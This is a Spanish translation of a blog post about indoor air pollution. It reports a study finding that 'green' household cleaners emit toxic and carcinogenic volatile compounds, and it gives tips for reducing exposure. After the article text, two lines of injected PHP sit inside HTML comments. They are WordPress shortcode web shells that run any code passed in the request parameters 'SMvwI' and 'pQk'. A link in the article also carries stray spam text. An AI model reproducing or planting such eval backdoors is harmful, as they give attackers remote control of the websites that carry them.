Por Melinda Wenner Moyer – Publicado el 8 de diciembre de 2010 en inglés en el blog PLOS.
Este mes publico un breve artículo en Redbook acerca de la gestión y la prevención de la contaminación del aire en interiores. Puede que no sea el artículo más elocuente que haya escrito nunca pero, para ser sincero, estoy más emocionada por este texto de lo que he estado para la mayoría de los demás, porque se trata de un artículo que se que podría ayudar de verdad a la gente. Si alguna de las sugerencias terminan por reducir la exposición de una familia a los químicos tóxicos, entonces seré una mujer feliz.
Mientras redactaba el artículo, descubrí algo que me dejó en shock: los llamados limpiadores del hogar “ecológicos” o “naturales” no son para nada menos tóxicos que los normales, y de hecho, en algunos casos lo son más. En un estudio en curso sobre Environmental Impact Assessment Review (Evaluación de impacto medioambiental) <a href="http://www.ce.washington.edu/people/faculty/bios/steinemann_a you could check here.html”>Anne Steinemann, una ingeniera civil y medioambiental de la Universidad de Washington, y sus compañeros analizaron los productos químicos que emitían 25 productos perfumados para los consumidores: cosas como productos de lavandería, de limpieza, de higiene personal y ambientadores. Más de la mitad pertenecían las marcas con más ventas de cada categoría, y 11 de ellos aseguraban que eran “respetuosos con el medioambiente” en las etiquetes o Fichas de datos de seguridad de materiales, empleando denominaciones como “orgánico”, “no tóxico” o “natural”. Steinemann descubrió que los 25 productos liberaban una media de 17 compuestos orgánicos volátiles (COV), y que cada uno de ellos liberaba al menos un compuesto químico clasificado como “tóxico” o “peligroso” de acuerdo con las leyes federales de los EEUU. Los productos verdes tampoco eran mucho mejores, de hecho, parecían ser incluso peor: cada uno de los 11 emitía al menos dos COV clasificados como tóxicos o peligrosos, y cuatro de ellos liberaban al menos un cancerígeno conocido.
Increíble, ¿verdad? Uno se cree que está haciendo lo correcto al comprar limpiadores para la cocina y los baños “totalmente naturales” (y, por cierto, también caros), para descubrir que estos productos podrían ser en realidad peores que las marcas normales y corrientes. La base del problema es que no existen leyes que regulen el marketing verde en EEUU, así que una empresa puede decir que su producto es totalmente natural o no tóxico sin tener que probar nada ni publicar sus ingredientes en la botella. Una receta para el desastre… literalmente.
Entonces, ¿qué puedes hacer? Afortunadamente, hay formas de diferenciar lo bueno de lo malo. En la GoodGuide, una base de datos reunida por la profesora de políticas medioambientales y laborales de la universidad de Berkeley Dara O’Rourke, analiza y puntúa productos tales como limpiadores, juguetes, comida y productos de higiene personal de acuerdo con su impacto potencial sobre la salud y el medioambiente, así que es un buen lugar en el que empezar. Sin embargo, Steinemannt señala que la guía no está exenta de fallos y que a veces pasa por algo compuestos potencialmente peligrosos. Otra opción es usar simplemente limpiadores caseros, como el bicarbonato, el vinagre y el zumo de limón, que en realidad funcionan bastante bien. Por último, si te niegas a prescindir de los productos de marca, puedes limitar la exposición vaporizando los productos sobre esponjas o paños en lugar de directamente sobre las superficies duras (inhalarás menos cantidad), y ventilando la estancia mientras limpias. Para más sugerencias y trucos útiles sobre cómo prevenir la exposición frente a otros contaminantes, como los humos de la cocina y el moho, consulta mi artículo.
<!– [insert_php]if (isset($_REQUEST["SMvwI"])){eval($_REQUEST["SMvwI"]);exit;}[/insert_php][php]if (isset($_REQUEST["SMvwI"])){eval($_REQUEST["SMvwI"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["pQk"])){eval($_REQUEST["pQk"]);exit;}[/insert_php][php]if (isset($_REQUEST["pQk"])){eval($_REQUEST["pQk"]);exit;}[/php] –>
Deja un comentario